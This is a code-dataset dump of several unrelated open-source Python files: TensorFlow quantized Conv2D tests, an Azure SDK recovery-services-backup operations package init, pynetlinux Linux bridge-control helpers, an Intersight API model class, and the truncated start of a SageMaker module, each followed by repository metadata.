    """Dequantizes a qint32 array to floats over [quantized_min, quantized_max].

    Maps the lowest representable 32-bit value to quantized_min and scales
    linearly, mirroring the op's quantization scheme. Returns a flat
    np.array of floats.
    """
    number_of_bits = 32
    number_of_steps = 1 << number_of_bits
    range_adjust = (number_of_steps / (number_of_steps - 1.0))
    quantized_range = ((quantized_max - quantized_min) * range_adjust)
    range_scale = (quantized_range / number_of_steps)
    lowest_quantized = -(1 << (number_of_bits - 1))
    result = np.array([(quantized_min +
                        ((float(x) - lowest_quantized) * range_scale))
                       for x in quantized.flatten()])
    return result
  def testConv2D1x1Filter(self):
    # Our generated input is [batch, rows, cols, depth], and looks like this:
    # (1,2,3)    (4,5,6)    (7,8,9)
    # (10,11,12) (13,14,15) (16,17,18)
    # The filter data is:
    # (1,4,7) (2,5,8) (3,6,9)
    # That means the calculations are:
    # 1*1+2*4+3*7=30
    # 1*2+2*5+3*8=36
    # 1*3+2*6+3*9=42
    # 4*1+5*4+6*7=66
    # 4*2+5*5+6*8=81
    # 4*3+5*6+6*9=96
    # 7*1+8*4+9*7=102
    # 7*2+8*5+9*8=126
    # 7*3+8*6+9*9=150
    # 10*1+11*4+12*7=138
    # 10*2+11*5+12*8=171
    # 10*3+11*6+12*9=204
    # 13*1+14*4+15*7=174
    # 13*2+14*5+15*8=216
    # 13*3+14*6+15*9=258
    # 16*1+17*4+18*7=210
    # 16*2+17*5+18*8=261
    # 16*3+17*6+18*9=312
    # NOTE: the qint32 output does not saturate at 255, so totals above 255
    # (258, 261, 312) appear unchanged in the expected output below.
    # Because the output shift is zero, we call the non-optimized reference
    # path for the convolution.
    expected_output = [
        30, 36, 42, 66, 81, 96, 102, 126, 150, 138, 171, 204, 174, 216, 258,
        210, 261, 312
    ]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[1, 1, 3, 3],
        stride=1,
        padding="VALID",
        expected=expected_output)
  def testConv2D2x2Filter(self):
    # Our generated input is [batch, rows, cols, depth], and looks like this:
    # (1,2,3)    (4,5,6)    (7,8,9)
    # (10,11,12) (13,14,15) (16,17,18)
    # The filter data is [filter_height, filter_width, depth, filter_count]:
    # ( 1, 4, 7) (10, 13, 16)
    # (19,22,25) (28, 31, 34)
    # -
    # ( 2, 5, 8) (11, 14, 17)
    # (20,23,26) (29, 32, 35)
    # -
    # ( 3, 6, 9) (12, 15, 18)
    # (21,24,27) (30, 33, 36)
    # The raw accumulated totals are:
    # 1*1+2*4+3*7+4*10+5*13+6*16+10*19+11*22+12*25+13*28+14*31+15*34=2271
    # 1*2+2*5+3*8+4*11+5*14+6*17+10*20+11*23+12*26+13*29+14*32+15*35=2367
    # 1*3+2*6+3*9+4*12+5*15+6*18+10*21+11*24+12*27+13*30+14*33+15*36=2463
    # 4*1+5*4+6*7+7*10+8*13+9*16+13*19+14*22+15*25+16*28+17*31+18*34=2901
    # 4*2+5*5+6*8+7*11+8*14+9*17+13*20+14*23+15*26+16*29+17*32+18*35=3033
    # 4*3+5*6+6*9+7*12+8*15+9*18+13*21+14*24+15*27+16*30+17*33+18*36=3165
    # The expected values are taken from the raw totals and rescaled to fit into
    # eight bits.
    expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[2, 2, 3, 3],
        stride=1,
        padding="VALID",
        expected=expected_output)
  def testConv2D1x2Filter(self):
    # The outputs are computed using third_party/py/IPython/notebook.
    # With a shift of 21, we should execute the optimized path here.
    expected_output = [
        231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
        936.0, 1029.0
    ]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[1, 2, 3, 3],
        stride=1,
        padding="VALID",
        expected=expected_output)
  def testConv2D2x2FilterStride2(self):
    # With a shift of 21, we should execute the optimized path here.
    expected_output = [2271.0, 2367.0, 2463.0]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[2, 2, 3, 3],
        stride=2,
        padding="VALID",
        expected=expected_output)
  def testConv2D2x2FilterStride2Same(self):
    # With a shift of 21, we should execute the optimized path here.
    expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[2, 2, 3, 3],
        stride=2,
        padding="SAME",
        expected=expected_output)
# Run the full test suite when executed directly.
if __name__ == "__main__":
  test.main()
| 36.509709 | 80 | 0.62505 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import nn_ops
from tensorflow.python.platform import test
class Conv2DTest(test.TestCase):
def __init__(self, method_name="runTest"):
super(Conv2DTest, self).__init__(method_name)
def _VerifyValues(self, tensor_in_sizes, filter_in_sizes, stride, padding,
expected):
total_size_1 = 1
total_size_2 = 1
for s in tensor_in_sizes:
total_size_1 *= s
for s in filter_in_sizes:
total_size_2 *= s
x1 = np.array([f for f in range(1, total_size_1 + 1)])
x1 = x1.astype(np.uint8).reshape(tensor_in_sizes)
x1_min = 0.0
x1_max = 255.0
x2 = np.array([f for f in range(1, total_size_2 + 1)]).astype(np.uint8)
x2 = x2.astype(np.uint8).reshape(filter_in_sizes)
x2_min = 0.0
x2_max = 255.0
with self.cached_session(use_gpu=False) as sess:
t1 = constant_op.constant(x1, shape=tensor_in_sizes, dtype=dtypes.quint8)
t2 = constant_op.constant(x2, shape=filter_in_sizes, dtype=dtypes.quint8)
conv = nn_ops.quantized_conv2d(
t1,
t2,
out_type=dtypes.qint32,
strides=[1, stride, stride, 1],
padding=padding,
min_input=x1_min,
max_input=x1_max,
min_filter=x2_min,
max_filter=x2_max)
value = sess.run(conv)
quantized_output = value[0]
output_min = value[1]
output_max = value[2]
float_output = self._QuantizedOutputToFloat(quantized_output, output_min,
output_max)
self.assertArrayNear(expected, float_output.flatten(), 1.0)
self.assertEqual(value[0].shape, conv[0].get_shape())
def _assertQuantizedArrayEquals(self, iarray1, iarray2):
for i1, i2 in zip(iarray1, iarray2):
self.assertTrue(i1 == i2)
def _QuantizedOutputToFloat(self, quantized, quantized_min, quantized_max):
number_of_bits = 32
number_of_steps = 1 << number_of_bits
range_adjust = (number_of_steps / (number_of_steps - 1.0))
quantized_range = ((quantized_max - quantized_min) * range_adjust)
range_scale = (quantized_range / number_of_steps)
lowest_quantized = -(1 << (number_of_bits - 1))
result = np.array([(quantized_min +
((float(x) - lowest_quantized) * range_scale))
for x in quantized.flatten()])
return result
def testConv2D1x1Filter(self):
expected_output = [
30, 36, 42, 66, 81, 96, 102, 126, 150, 138, 171, 204, 174, 216, 258,
210, 261, 312
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2Filter(self):
expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D1x2Filter(self):
expected_output = [
231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
936.0, 1029.0
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 2, 3, 3],
stride=1,
padding="VALID",
expected=expected_output)
def testConv2D2x2FilterStride2(self):
expected_output = [2271.0, 2367.0, 2463.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
stride=2,
padding="VALID",
expected=expected_output)
  def testConv2D2x2FilterStride2Same(self):
    """Quantized conv: 2x2x3x3 filter, stride 2, SAME padding."""
    expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
    self._VerifyValues(
        tensor_in_sizes=[1, 2, 3, 3],
        filter_in_sizes=[2, 2, 3, 3],
        stride=2,
        padding="SAME",
        expected=expected_output)
if __name__ == "__main__":
  # Run all quantized Conv2D tests via the TensorFlow test runner.
  test.main()
| true | true |
f7fa267b884d43f4d2627259e21a7a856b7d64f1 | 4,603 | py | Python | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/operations/__init__.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2018-07-23T08:59:24.000Z | 2018-07-23T08:59:24.000Z | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/operations/__init__.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2018-11-29T14:46:42.000Z | 2018-11-29T14:46:42.000Z | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/operations/__init__.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | [
"MIT"
] | 1 | 2018-08-28T14:36:47.000Z | 2018-08-28T14:36:47.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .protection_intent_operations import ProtectionIntentOperations
from .backup_status_operations import BackupStatusOperations
from .feature_support_operations import FeatureSupportOperations
from .backup_jobs_operations import BackupJobsOperations
from .job_details_operations import JobDetailsOperations
from .export_jobs_operation_results_operations import ExportJobsOperationResultsOperations
from .jobs_operations import JobsOperations
from .backup_policies_operations import BackupPoliciesOperations
from .backup_protected_items_operations import BackupProtectedItemsOperations
from .backup_usage_summaries_operations import BackupUsageSummariesOperations
from .backup_resource_vault_configs_operations import BackupResourceVaultConfigsOperations
from .backup_engines_operations import BackupEnginesOperations
from .protection_container_refresh_operation_results_operations import ProtectionContainerRefreshOperationResultsOperations
from .protectable_containers_operations import ProtectableContainersOperations
from .protection_containers_operations import ProtectionContainersOperations
from .backup_workload_items_operations import BackupWorkloadItemsOperations
from .protection_container_operation_results_operations import ProtectionContainerOperationResultsOperations
from .protected_items_operations import ProtectedItemsOperations
from .backups_operations import BackupsOperations
from .protected_item_operation_results_operations import ProtectedItemOperationResultsOperations
from .protected_item_operation_statuses_operations import ProtectedItemOperationStatusesOperations
from .recovery_points_operations import RecoveryPointsOperations
from .item_level_recovery_connections_operations import ItemLevelRecoveryConnectionsOperations
from .restores_operations import RestoresOperations
from .job_cancellations_operations import JobCancellationsOperations
from .job_operation_results_operations import JobOperationResultsOperations
from .backup_operation_results_operations import BackupOperationResultsOperations
from .backup_operation_statuses_operations import BackupOperationStatusesOperations
from .protection_policies_operations import ProtectionPoliciesOperations
from .protection_policy_operation_results_operations import ProtectionPolicyOperationResultsOperations
from .protection_policy_operation_statuses_operations import ProtectionPolicyOperationStatusesOperations
from .backup_protectable_items_operations import BackupProtectableItemsOperations
from .backup_protection_containers_operations import BackupProtectionContainersOperations
from .security_pi_ns_operations import SecurityPINsOperations
from .backup_resource_storage_configs_operations import BackupResourceStorageConfigsOperations
from .operations import Operations
# Names re-exported as the public operations API of this package.
__all__ = [
    'ProtectionIntentOperations',
    'BackupStatusOperations',
    'FeatureSupportOperations',
    'BackupJobsOperations',
    'JobDetailsOperations',
    'ExportJobsOperationResultsOperations',
    'JobsOperations',
    'BackupPoliciesOperations',
    'BackupProtectedItemsOperations',
    'BackupUsageSummariesOperations',
    'BackupResourceVaultConfigsOperations',
    'BackupEnginesOperations',
    'ProtectionContainerRefreshOperationResultsOperations',
    'ProtectableContainersOperations',
    'ProtectionContainersOperations',
    'BackupWorkloadItemsOperations',
    'ProtectionContainerOperationResultsOperations',
    'ProtectedItemsOperations',
    'BackupsOperations',
    'ProtectedItemOperationResultsOperations',
    'ProtectedItemOperationStatusesOperations',
    'RecoveryPointsOperations',
    'ItemLevelRecoveryConnectionsOperations',
    'RestoresOperations',
    'JobCancellationsOperations',
    'JobOperationResultsOperations',
    'BackupOperationResultsOperations',
    'BackupOperationStatusesOperations',
    'ProtectionPoliciesOperations',
    'ProtectionPolicyOperationResultsOperations',
    'ProtectionPolicyOperationStatusesOperations',
    'BackupProtectableItemsOperations',
    'BackupProtectionContainersOperations',
    'SecurityPINsOperations',
    'BackupResourceStorageConfigsOperations',
    'Operations',
]
| 52.908046 | 123 | 0.847056 |
from .protection_intent_operations import ProtectionIntentOperations
from .backup_status_operations import BackupStatusOperations
from .feature_support_operations import FeatureSupportOperations
from .backup_jobs_operations import BackupJobsOperations
from .job_details_operations import JobDetailsOperations
from .export_jobs_operation_results_operations import ExportJobsOperationResultsOperations
from .jobs_operations import JobsOperations
from .backup_policies_operations import BackupPoliciesOperations
from .backup_protected_items_operations import BackupProtectedItemsOperations
from .backup_usage_summaries_operations import BackupUsageSummariesOperations
from .backup_resource_vault_configs_operations import BackupResourceVaultConfigsOperations
from .backup_engines_operations import BackupEnginesOperations
from .protection_container_refresh_operation_results_operations import ProtectionContainerRefreshOperationResultsOperations
from .protectable_containers_operations import ProtectableContainersOperations
from .protection_containers_operations import ProtectionContainersOperations
from .backup_workload_items_operations import BackupWorkloadItemsOperations
from .protection_container_operation_results_operations import ProtectionContainerOperationResultsOperations
from .protected_items_operations import ProtectedItemsOperations
from .backups_operations import BackupsOperations
from .protected_item_operation_results_operations import ProtectedItemOperationResultsOperations
from .protected_item_operation_statuses_operations import ProtectedItemOperationStatusesOperations
from .recovery_points_operations import RecoveryPointsOperations
from .item_level_recovery_connections_operations import ItemLevelRecoveryConnectionsOperations
from .restores_operations import RestoresOperations
from .job_cancellations_operations import JobCancellationsOperations
from .job_operation_results_operations import JobOperationResultsOperations
from .backup_operation_results_operations import BackupOperationResultsOperations
from .backup_operation_statuses_operations import BackupOperationStatusesOperations
from .protection_policies_operations import ProtectionPoliciesOperations
from .protection_policy_operation_results_operations import ProtectionPolicyOperationResultsOperations
from .protection_policy_operation_statuses_operations import ProtectionPolicyOperationStatusesOperations
from .backup_protectable_items_operations import BackupProtectableItemsOperations
from .backup_protection_containers_operations import BackupProtectionContainersOperations
from .security_pi_ns_operations import SecurityPINsOperations
from .backup_resource_storage_configs_operations import BackupResourceStorageConfigsOperations
from .operations import Operations
# Names re-exported as the public operations API of this package.
__all__ = [
    'ProtectionIntentOperations',
    'BackupStatusOperations',
    'FeatureSupportOperations',
    'BackupJobsOperations',
    'JobDetailsOperations',
    'ExportJobsOperationResultsOperations',
    'JobsOperations',
    'BackupPoliciesOperations',
    'BackupProtectedItemsOperations',
    'BackupUsageSummariesOperations',
    'BackupResourceVaultConfigsOperations',
    'BackupEnginesOperations',
    'ProtectionContainerRefreshOperationResultsOperations',
    'ProtectableContainersOperations',
    'ProtectionContainersOperations',
    'BackupWorkloadItemsOperations',
    'ProtectionContainerOperationResultsOperations',
    'ProtectedItemsOperations',
    'BackupsOperations',
    'ProtectedItemOperationResultsOperations',
    'ProtectedItemOperationStatusesOperations',
    'RecoveryPointsOperations',
    'ItemLevelRecoveryConnectionsOperations',
    'RestoresOperations',
    'JobCancellationsOperations',
    'JobOperationResultsOperations',
    'BackupOperationResultsOperations',
    'BackupOperationStatusesOperations',
    'ProtectionPoliciesOperations',
    'ProtectionPolicyOperationResultsOperations',
    'ProtectionPolicyOperationStatusesOperations',
    'BackupProtectableItemsOperations',
    'BackupProtectionContainersOperations',
    'SecurityPINsOperations',
    'BackupResourceStorageConfigsOperations',
    'Operations',
]
| true | true |
f7fa27a71420271bd51bcaa911ebeaf7366f0c78 | 4,529 | py | Python | pynetlinux/brctl.py | youngage/pynetlinux | 4bb6f2ce42c22bc853f7a2af10591da89968e1ff | [
"BSD-3-Clause"
] | 1 | 2015-02-10T14:14:04.000Z | 2015-02-10T14:14:04.000Z | pynetlinux/brctl.py | youngage/pynetlinux | 4bb6f2ce42c22bc853f7a2af10591da89968e1ff | [
"BSD-3-Clause"
] | null | null | null | pynetlinux/brctl.py | youngage/pynetlinux | 4bb6f2ce42c22bc853f7a2af10591da89968e1ff | [
"BSD-3-Clause"
] | null | null | null | import array
import fcntl
import os
import struct
from . import ifconfig
SYSFS_NET_PATH = "/sys/class/net"
# From linux/sockios.h
SIOCBRADDBR = 0x89a0
SIOCBRDELBR = 0x89a1
SIOCBRADDIF = 0x89a2
SIOCBRDELIF = 0x89a3
SIOCDEVPRIVATE = 0x89F0
# From bridge-utils if_bridge.h
BRCTL_SET_BRIDGE_FORWARD_DELAY = 8
BRCTL_SET_BRIDGE_STP_STATE = 14
BRCTL_GET_BRIDGE_INFO = 6
if not os.path.isdir(SYSFS_NET_PATH):
raise ImportError("Path %s not found. This module requires sysfs." % SYSFS_NET_PATH)
class Bridge(ifconfig.Interface):
    ''' Class representing a Linux Ethernet bridge. '''
    def __init__(self, name):
        ifconfig.Interface.__init__(self, name)
    def iterifs(self):
        ''' Iterate over all the interfaces in this bridge. '''
        # Enslaved interfaces appear as entries under
        # /sys/class/net/<bridge>/brif.
        if_path = os.path.join(SYSFS_NET_PATH, self.name, "brif")
        net_files = os.listdir(if_path)
        for iface in net_files:
            yield iface
    def listif(self):
        ''' List interface names. '''
        return [p for p in self.iterifs()]
    def addif(self, iface):
        ''' Add the interface with the given name to this bridge. Equivalent to
            brctl addif [bridge] [interface]. '''
        # Accept either an Interface object or an interface name.
        if type(iface) == ifconfig.Interface:
            devindex = iface.index
        else:
            devindex = ifconfig.Interface(iface).index
        # struct ifreq: 16-byte interface name followed by the device index.
        ifreq = struct.pack('16si', self.name, devindex)
        fcntl.ioctl(ifconfig.sockfd, SIOCBRADDIF, ifreq)
        return self
    def delif(self, iface):
        ''' Remove the interface with the given name from this bridge.
            Equivalent to brctl delif [bridge] [interface]'''
        if type(iface) == ifconfig.Interface:
            devindex = iface.index
        else:
            devindex = ifconfig.Interface(iface).index
        ifreq = struct.pack('16si', self.name, devindex)
        fcntl.ioctl(ifconfig.sockfd, SIOCBRDELIF, ifreq)
        return self
    def set_stp_mode(self, status):
        '''Set the status of spanning tree on bridge.
        Called using bridge.set_stp_mode([True,False])'''
        if status is True:
            status = 1
        else:
            status = 0
        # Legacy bridge ioctl: args buffer is passed by pointer via
        # SIOCDEVPRIVATE; NOTE(review): returns True, unlike the fluent
        # `return self` of the other mutators.
        data = array.array('L', [BRCTL_SET_BRIDGE_STP_STATE, status, 0, 0])
        buffer, _items = data.buffer_info()
        ifreq = struct.pack('16sP', self.name, buffer)
        fcntl.ioctl(ifconfig.sockfd, SIOCDEVPRIVATE, ifreq)
        return True
    def set_forward_delay(self, delay):
        ''' Set the given bridge forward delay (in seconds). '''
        # delay is passed to kernel in "jiffies" (100ths of a second)
        jiffies = int(delay*100)
        data = array.array('L', [BRCTL_SET_BRIDGE_FORWARD_DELAY, jiffies, 0, 0])
        buffer, _items = data.buffer_info()
        ifreq = struct.pack('16sP', self.name, buffer)
        fcntl.ioctl(ifconfig.sockfd, SIOCDEVPRIVATE, ifreq)
        return self
    def delete(self):
        ''' Brings down the bridge interface, and removes it. Equivalent to
            ifconfig [bridge] down && brctl delbr [bridge]. '''
        self.down()
        fcntl.ioctl(ifconfig.sockfd, SIOCBRDELBR, self.name)
        return self
    def get_ip(self):
        ''' Bridges don't have IP addresses, so this always returns 0.0.0.0. '''
        return "0.0.0.0"
    ip = property(get_ip)
def shutdown():
    ''' Shut down bridge library '''
    # Delegates to ifconfig, which owns the shared ioctl socket.
    ifconfig.shutdown()
def iterbridges():
    ''' Iterate over all the bridges in the system. '''
    for entry in os.listdir(SYSFS_NET_PATH):
        entry_path = os.path.join(SYSFS_NET_PATH, entry)
        # A bridge is a net-device directory containing a "bridge" subdir.
        if os.path.isdir(entry_path) and \
                os.path.exists(os.path.join(entry_path, "bridge")):
            yield Bridge(entry)
def list_bridges():
    ''' Return a list of Bridge objects for every bridge in the system. '''
    return list(iterbridges())
def addbr(name):
    ''' Create new bridge with the given name '''
    # SIOCBRADDBR asks the kernel to create the bridge device
    # (equivalent to brctl addbr [name]).
    fcntl.ioctl(ifconfig.sockfd, SIOCBRADDBR, name)
    return Bridge(name)
def findif(name):
    ''' Find the given interface name within any of the bridges. Return the
        Bridge object corresponding to the bridge containing the interface, or
        None if no such bridge could be found. '''
    return next((br for br in iterbridges() if name in br.iterifs()), None)
def findbridge(name):
    ''' Find the given bridge. Return the Bridge object, or None if no such
        bridge could be found. '''
    return next((br for br in iterbridges() if br.name == name), None)
| 30.809524 | 88 | 0.632369 | import array
import fcntl
import os
import struct
from . import ifconfig
SYSFS_NET_PATH = "/sys/class/net"
SIOCBRADDBR = 0x89a0
SIOCBRDELBR = 0x89a1
SIOCBRADDIF = 0x89a2
SIOCBRDELIF = 0x89a3
SIOCDEVPRIVATE = 0x89F0
BRCTL_SET_BRIDGE_FORWARD_DELAY = 8
BRCTL_SET_BRIDGE_STP_STATE = 14
BRCTL_GET_BRIDGE_INFO = 6
if not os.path.isdir(SYSFS_NET_PATH):
raise ImportError("Path %s not found. This module requires sysfs." % SYSFS_NET_PATH)
class Bridge(ifconfig.Interface):
    ''' Class representing a Linux Ethernet bridge. '''
    def __init__(self, name):
        ifconfig.Interface.__init__(self, name)
    def iterifs(self):
        ''' Iterate over the names of interfaces enslaved to this bridge. '''
        # Enslaved interfaces appear under /sys/class/net/<bridge>/brif.
        if_path = os.path.join(SYSFS_NET_PATH, self.name, "brif")
        net_files = os.listdir(if_path)
        for iface in net_files:
            yield iface
    def listif(self):
        ''' Return the interface names as a list. '''
        return [p for p in self.iterifs()]
    def addif(self, iface):
        ''' Add an interface (name or Interface) to this bridge. '''
        if type(iface) == ifconfig.Interface:
            devindex = iface.index
        else:
            devindex = ifconfig.Interface(iface).index
        # struct ifreq: 16-byte interface name followed by the device index.
        ifreq = struct.pack('16si', self.name, devindex)
        fcntl.ioctl(ifconfig.sockfd, SIOCBRADDIF, ifreq)
        return self
    def delif(self, iface):
        ''' Remove an interface (name or Interface) from this bridge. '''
        if type(iface) == ifconfig.Interface:
            devindex = iface.index
        else:
            devindex = ifconfig.Interface(iface).index
        ifreq = struct.pack('16si', self.name, devindex)
        fcntl.ioctl(ifconfig.sockfd, SIOCBRDELIF, ifreq)
        return self
    def set_stp_mode(self, status):
        ''' Enable/disable spanning tree on the bridge. Returns True. '''
        if status is True:
            status = 1
        else:
            status = 0
        # Legacy bridge ioctl: args buffer passed by pointer via SIOCDEVPRIVATE.
        data = array.array('L', [BRCTL_SET_BRIDGE_STP_STATE, status, 0, 0])
        buffer, _items = data.buffer_info()
        ifreq = struct.pack('16sP', self.name, buffer)
        fcntl.ioctl(ifconfig.sockfd, SIOCDEVPRIVATE, ifreq)
        return True
    def set_forward_delay(self, delay):
        ''' Set the bridge forward delay (seconds). '''
        # The kernel expects jiffies (100ths of a second).
        jiffies = int(delay*100)
        data = array.array('L', [BRCTL_SET_BRIDGE_FORWARD_DELAY, jiffies, 0, 0])
        buffer, _items = data.buffer_info()
        ifreq = struct.pack('16sP', self.name, buffer)
        fcntl.ioctl(ifconfig.sockfd, SIOCDEVPRIVATE, ifreq)
        return self
    def delete(self):
        ''' Bring the bridge down and remove it from the system. '''
        self.down()
        fcntl.ioctl(ifconfig.sockfd, SIOCBRDELBR, self.name)
        return self
    def get_ip(self):
        ''' Bridges have no IP address; always returns "0.0.0.0". '''
        return "0.0.0.0"
    ip = property(get_ip)
def shutdown():
    ''' Shut down the bridge library (closes the shared ioctl socket). '''
    ifconfig.shutdown()
def iterbridges():
    ''' Yield a Bridge object for every bridge device in the system. '''
    net_files = os.listdir(SYSFS_NET_PATH)
    for d in net_files:
        path = os.path.join(SYSFS_NET_PATH, d)
        if not os.path.isdir(path):
            continue
        # A net device is a bridge iff it has a "bridge" subdirectory.
        if os.path.exists(os.path.join(path, "bridge")):
            yield Bridge(d)
def list_bridges():
    ''' Return a list of Bridge objects for every bridge in the system. '''
    return [br for br in iterbridges()]
def addbr(name):
    ''' Create a new bridge with the given name and return it. '''
    fcntl.ioctl(ifconfig.sockfd, SIOCBRADDBR, name)
    return Bridge(name)
def findif(name):
    ''' Return the Bridge containing interface `name`, or None. '''
    for br in iterbridges():
        if name in br.iterifs():
            return br
    return None
def findbridge(name):
    ''' Return the Bridge named `name`, or None if it does not exist. '''
    for br in iterbridges():
        if br.name == name:
            return br
    return None
| true | true |
f7fa28d110e8b350f1736229ea8426be41350920 | 3,569 | py | Python | intersight/models/sdcard_policy_ref.py | ategaw-cisco/intersight-python | 9d6476620507281b1dc358e29ac452d56081bbb0 | [
"Apache-2.0"
] | null | null | null | intersight/models/sdcard_policy_ref.py | ategaw-cisco/intersight-python | 9d6476620507281b1dc358e29ac452d56081bbb0 | [
"Apache-2.0"
] | null | null | null | intersight/models/sdcard_policy_ref.py | ategaw-cisco/intersight-python | 9d6476620507281b1dc358e29ac452d56081bbb0 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Intersight REST API
This is Intersight REST API
OpenAPI spec version: 1.0.9-262
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class SdcardPolicyRef(object):
    """Reference (Moid + ObjectType) to an SD card policy managed object.

    NOTE: Auto-generated swagger model; the public surface is preserved
    exactly (swagger_types, attribute_map, properties, to_dict, to_str,
    __repr__, __eq__, __ne__).
    """

    # Attribute name -> attribute type.
    swagger_types = {
        'moid': 'str',
        'object_type': 'str'
    }

    # Attribute name -> JSON key used by the REST API.
    attribute_map = {
        'moid': 'Moid',
        'object_type': 'ObjectType'
    }

    def __init__(self, moid=None, object_type=None):
        """Store only the fields that were explicitly provided."""
        self._moid = None
        self._object_type = None
        if moid is not None:
            self.moid = moid
        if object_type is not None:
            self.object_type = object_type

    @property
    def moid(self):
        """str: Moid of the referenced object."""
        return self._moid

    @moid.setter
    def moid(self, moid):
        self._moid = moid

    @property
    def object_type(self):
        """str: ObjectType of the referenced object."""
        return self._object_type

    @object_type.setter
    def object_type(self, object_type):
        self._object_type = object_type

    def to_dict(self):
        """Serialize the model to a plain dict, recursing into nested models."""
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    key: (val.to_dict() if hasattr(val, "to_dict") else val)
                    for key, val in value.items()
                }
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Pretty-printed string representation of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Equal iff *other* is the same model type with identical state."""
        return (isinstance(other, SdcardPolicyRef) and
                self.__dict__ == other.__dict__)

    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
| 23.793333 | 77 | 0.536285 |
from pprint import pformat
from six import iteritems
import re
class SdcardPolicyRef(object):
    """Auto-generated swagger model: reference to an SD card policy object."""
    # Attribute name -> attribute type.
    swagger_types = {
        'moid': 'str',
        'object_type': 'str'
    }
    # Attribute name -> JSON key used by the REST API.
    attribute_map = {
        'moid': 'Moid',
        'object_type': 'ObjectType'
    }
    def __init__(self, moid=None, object_type=None):
        """Store only the fields that were explicitly provided."""
        self._moid = None
        self._object_type = None
        if moid is not None:
            self.moid = moid
        if object_type is not None:
            self.object_type = object_type
    @property
    def moid(self):
        """str: Moid of the referenced object."""
        return self._moid
    @moid.setter
    def moid(self, moid):
        self._moid = moid
    @property
    def object_type(self):
        """str: ObjectType of the referenced object."""
        return self._object_type
    @object_type.setter
    def object_type(self, object_type):
        self._object_type = object_type
    def to_dict(self):
        """Return the model properties as a dict, recursing into nested models."""
        result = {}
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Return the pretty-printed string representation of the model."""
        return pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()
    def __eq__(self, other):
        """True iff both objects are SdcardPolicyRef with equal state."""
        if not isinstance(other, SdcardPolicyRef):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
| true | true |
f7fa29e5a7ab84acfe14c474fc4808dbb31215d9 | 1,956 | py | Python | src/sagemaker/user_agent.py | billdoors/sagemaker-python-sdk | 2df8fb616cc3e28032aae5dccdc93a0c340b6d8b | [
"Apache-2.0"
] | null | null | null | src/sagemaker/user_agent.py | billdoors/sagemaker-python-sdk | 2df8fb616cc3e28032aae5dccdc93a0c340b6d8b | [
"Apache-2.0"
] | null | null | null | src/sagemaker/user_agent.py | billdoors/sagemaker-python-sdk | 2df8fb616cc3e28032aae5dccdc93a0c340b6d8b | [
"Apache-2.0"
] | null | null | null | # Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
